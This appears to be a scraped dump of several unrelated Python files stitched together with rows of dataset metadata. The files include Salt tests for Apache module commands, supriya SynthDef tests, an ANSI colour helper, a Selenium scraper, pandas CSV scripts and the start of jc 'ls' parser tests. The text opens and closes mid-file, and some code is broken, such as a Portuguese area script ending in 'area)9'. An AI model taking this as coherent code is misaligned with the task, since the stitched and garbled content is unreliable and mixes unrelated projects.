'Status': 'Mod vhost_alias Not found'})
def test_a2dismod_disabled(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias disabled'})
def test_a2dismod(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
'Status': 2})
def test_a2dismod_exception(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2dismod('vhost_alias')),
'error')
# 'check_conf_enabled' function tests: 2
def test_check_conf_enabled(self):
'''
Test if the specific conf symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_conf_enabled('security.conf'))
def test_check_conf_enabled_false(self):
'''
Test if the specific conf symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_conf_enabled('security.conf'))
# 'a2enconf' function tests: 4
def test_a2enconf_notfound(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 'Conf security Not found'})
def test_a2enconf_enabled(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 'Conf security enabled'})
def test_a2enconf(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 2})
def test_a2enconf_exception(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2enconf('security')),
'error')
# 'a2disconf' function tests: 4
def test_a2disconf_notfound(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 'Conf security Not found'})
def test_a2disconf_disabled(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 'Conf security disabled'})
def test_a2disconf(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 2})
def test_a2disconf_exception(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2disconf('security')),
'error')
| 38.868347 | 76 | 0.555564 | 1,462 | 13,876 | 5.059508 | 0.070451 | 0.071786 | 0.086522 | 0.038935 | 0.881979 | 0.833852 | 0.81114 | 0.778829 | 0.767203 | 0.767203 | 0 | 0.015386 | 0.325526 | 13,876 | 356 | 77 | 38.977528 | 0.774976 | 0.135774 | 0 | 0.673367 | 0 | 0 | 0.180872 | 0 | 0 | 0 | 0 | 0 | 0.155779 | 1 | 0.160804 | false | 0 | 0.025126 | 0.005025 | 0.19598 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
71f4bb5debc740817a602abfca31efecb20fca24 | 681 | py | Python | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | 2 | 2020-11-24T15:51:15.000Z | 2021-01-20T03:52:53.000Z | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | null | null | null | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | null | null | null | def green(text):
return '\033[42m' + text + '\033[0m'
def blue(text):
return '\033[44m' + text + '\033[0m'
def yellow(text):
return '\033[43m' + text + '\033[0m'
def red(text):
return '\033[41m' + text + '\033[0m'
def white(text):
return '\u001b[47m' + text + '\033[0m'
def black(text):
return '\u001b[40m' + text + '\033[0m'
def magenta(text):
return '\u001b[45m' + text + '\033[0m'
def cyan(text):
return '\u001b[46m' + text + '\033[0m'
# Decorations
def bold(text):
return '\033[1m' + text + '\033[0m'
def underline(text):
return '\033[4m' + text + '\033[0m'
def reversed(text):
return '\033[7m' + text + '\033[0m' | 19.457143 | 42 | 0.563877 | 100 | 681 | 3.84 | 0.29 | 0.286458 | 0.257813 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.22467 | 681 | 35 | 43 | 19.457143 | 0.545455 | 0.016153 | 0 | 0 | 0 | 0 | 0.254111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
9c15707ecc1cbd3284e63d154df80e014cd5996a | 5,577 | py | Python | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | import uqbar.strings
import supriya.ugens
from supriya import SynthDefFactory
def test_gate_01():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output()
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- BinaryOpUGen(MULTIPLICATION).ar:
left: SinOsc.ar[0]
right: Linen.kr[0]
- Out.ar:
bus: Control.ir[0:out]
source[0]: BinaryOpUGen(MULTIPLICATION).ar[0]
"""
)
+ "\n"
)
def test_gate_02():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr:
left: Control.kr[1:mix]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[0:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
def test_gate_03():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True, windowed=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Line.kr:
done_action: 2.0
duration: Control.ir[0:duration]
start: 0.0
stop: 1.0
- UnaryOpUGen(HANNING_WINDOW).kr:
source: Line.kr[0]
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr:
left: UnaryOpUGen(HANNING_WINDOW).kr[0]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[1:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
def test_gate_04():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True, leveled=True, windowed=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Line.kr:
done_action: 2.0
duration: Control.ir[0:duration]
start: 0.0
stop: 1.0
- UnaryOpUGen(HANNING_WINDOW).kr:
source: Line.kr[0]
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr/0:
left: UnaryOpUGen(HANNING_WINDOW).kr[0]
right: Control.kr[1:level]
- BinaryOpUGen(MULTIPLICATION).kr/1:
left: BinaryOpUGen(MULTIPLICATION).kr/0[0]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[1:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr/1[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
| 31.508475 | 79 | 0.467097 | 546 | 5,577 | 4.664835 | 0.131868 | 0.018846 | 0.084806 | 0.028269 | 0.897134 | 0.891637 | 0.878288 | 0.846879 | 0.846879 | 0.835885 | 0 | 0.039519 | 0.432849 | 5,577 | 176 | 80 | 31.6875 | 0.765729 | 0 | 0 | 0.654545 | 0 | 0 | 0.013158 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 1 | 0.145455 | false | 0 | 0.054545 | 0.072727 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c6002868cf1def601a4421a1cdbbeeb76a7e94a | 210 | py | Python | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | from code_delivery.ext.db import db
from code_delivery.ext.db import models
def init_app(app):
@app.cli.command()
def create_db():
"""This command initializes the db"""
db.create_all()
| 23.333333 | 45 | 0.67619 | 32 | 210 | 4.28125 | 0.53125 | 0.116788 | 0.233577 | 0.277372 | 0.394161 | 0.394161 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209524 | 210 | 8 | 46 | 26.25 | 0.825301 | 0.147619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c78a842f25827139018c5c99ebb0f1ce3e54abd | 176 | py | Python | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | 1 | 2021-11-28T18:49:21.000Z | 2021-11-28T18:49:21.000Z | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | null | null | null | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | null | null | null | print('A seguir digite o valor do lado de um quadrado para saber sua área')
lado = float(input('digite o valor do lado: '))
area = lado**2
print('O valor da área é: ',area)9 | 25.142857 | 75 | 0.693182 | 34 | 176 | 3.588235 | 0.647059 | 0.147541 | 0.196721 | 0.229508 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013986 | 0.1875 | 176 | 7 | 76 | 25.142857 | 0.839161 | 0 | 0 | 0 | 0 | 0 | 0.615819 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92dac1a798bbb71a144499b710829e1ba02b259d | 1,172 | py | Python | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | 5 | 2020-03-31T01:41:12.000Z | 2021-12-10T10:25:30.000Z | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | null | null | null | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'一个招投标网站信息采集工具'
__author__ = 'Zhang Minghao'
#读取配置文件
import time, logger
def get_class(driver, url, info_class_name):
attempts = 0
success = False
while attempts < 3 and not success:
try:
driver.get(url)
time.sleep(1)
info = driver.find_element_by_class_name(info_class_name).text
success = True
logger.debug(f'{url} 抓取成功!')
except:
attempts += 1
if attempts == 3:
info = '抓取重试次数达到3次,内容页抓取失败!'
logger.error(f'{url} {info}')
break
return info
def get_id(driver, url, info_id_name):
attempts = 0
success = False
while attempts < 3 and not success:
try:
driver.get(url)
time.sleep(1)
info = driver.find_element_by_id(info_id_name).text
success = True
logger.debug(f'{url} 抓取成功!')
except:
attempts += 1
if attempts == 3:
info = '抓取重试次数达到3次,内容页抓取失败!'
logger.error(f'{url} {info}')
break
return info | 26.636364 | 74 | 0.525597 | 134 | 1,172 | 4.440299 | 0.365672 | 0.047059 | 0.043697 | 0.067227 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0.736134 | 0 | 0.018996 | 0.37116 | 1,172 | 44 | 75 | 26.636364 | 0.788331 | 0.053754 | 0 | 0.810811 | 0 | 0 | 0.098127 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
130d4a57dc6dbb9f34a5fe7ba49abeaa9b909bc3 | 2,107 | py | Python | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_Visualization | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | 5 | 2017-07-12T18:10:38.000Z | 2017-12-29T02:40:24.000Z | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_demo | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | null | null | null | DataProcess/WithdrawSpecificCol.py | ztlevi/TRI_demo | c9abfc9c41da1dcef71e3a6673bebeb299317014 | [
"FSFAP"
] | null | null | null | import pandas as pd
df1 = pd.read_csv('synced_118_07182017_DataLogger_01.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df1, columns= ['time [s]', 'long accel [g]', 'lat accel [g]', 'vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
print pd.DataFrame(df1, columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
df1_to_save = pd.DataFrame(df1,columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]'])
df1_to_save.to_csv('output01.csv',index=False)
df2 = pd.read_csv('synced_2017_07_18-14_10_38_Summary.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df2, columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
print pd.DataFrame(df2, columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df2_to_save = pd.DataFrame(df2,columns= ['Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df2_to_save.to_csv('output02.csv',index=False)
df3 = pd.read_csv('Synchronized_data_Yuanma_Trip6.csv',error_bad_lines=False, index_col=False, dtype='unicode')
pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
print pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
df3_to_save = pd.DataFrame(df3, columns= ['ecg', 'gsr', 'scl','scr', 'driver_workload', 'expert_workload', 'traffic_load','event','GPS heading [degs]'])
df3_to_save.to_csv('output03.csv',index=False)
df4 = pd.merge(df1,df2, how = 'outer', on='GPS lat [degs]')
df4_to_save = pd.DataFrame(df4, columns= ['time [s]', 'long accel [g]', 'lat accel [g]','vector accel [g]', 'vert accel [g]', 'speed [mph]', 'GPS long [degs]', 'GPS lat [degs]', 'Time', 'HR', 'BR','Posture', 'Activity', 'PeakAccel', 'HRV'])
df4_to_save.to_csv('trip6.csv',index=False)
| 61.970588 | 240 | 0.669673 | 323 | 2,107 | 4.201238 | 0.232198 | 0.070744 | 0.036846 | 0.047163 | 0.764923 | 0.764923 | 0.764923 | 0.73913 | 0.73913 | 0.73913 | 0 | 0.031069 | 0.098719 | 2,107 | 33 | 241 | 63.848485 | 0.683518 | 0 | 0 | 0 | 0 | 0 | 0.467489 | 0.051732 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13372bd5f270393ffe5c3f0876558885912c5d9a | 21,751 | py | Python | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 3,215 | 2019-10-24T15:25:56.000Z | 2022-03-31T15:43:01.000Z | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 109 | 2019-11-02T16:22:29.000Z | 2022-03-30T17:32:17.000Z | tests/test_ls.py | listuser/jc | 3ac8d0362b4fb9999fc55a60a9cb20ac80d114f7 | [
"MIT"
] | 75 | 2020-02-07T00:16:32.000Z | 2022-03-29T09:29:53.000Z | import os
import sys
import time
import json
import unittest
import jc.parsers.ls
# Directory containing this test module; fixture paths are resolved relative
# to it so the tests work regardless of the current working directory.
THIS_DIR = os.path.dirname(os.path.abspath(__file__))

# Set the timezone on POSIX systems. Need to manually set for Windows tests.
# The guard skips this on Windows, where time.tzset() is unavailable; fixing
# TZ keeps timestamp-dependent expected output stable across machines.
if not sys.platform.startswith('win32'):
    os.environ['TZ'] = 'America/Los_Angeles'
    time.tzset()
class MyTests(unittest.TestCase):
def setUp(self):
# input
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-al.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-al.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-al.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-al.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_al = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alh.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alh.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-alh.out'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alh.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alh = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alR.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alR.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alR.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alR = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-glob.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-glob.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-glob.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_glob = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-l-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_l_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-newlines.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_newlines = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-empty-folder.out'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_empty_folder = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-iso.out'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_iso = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-al.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-al.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-al.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_al_json = json.loads(f.read())
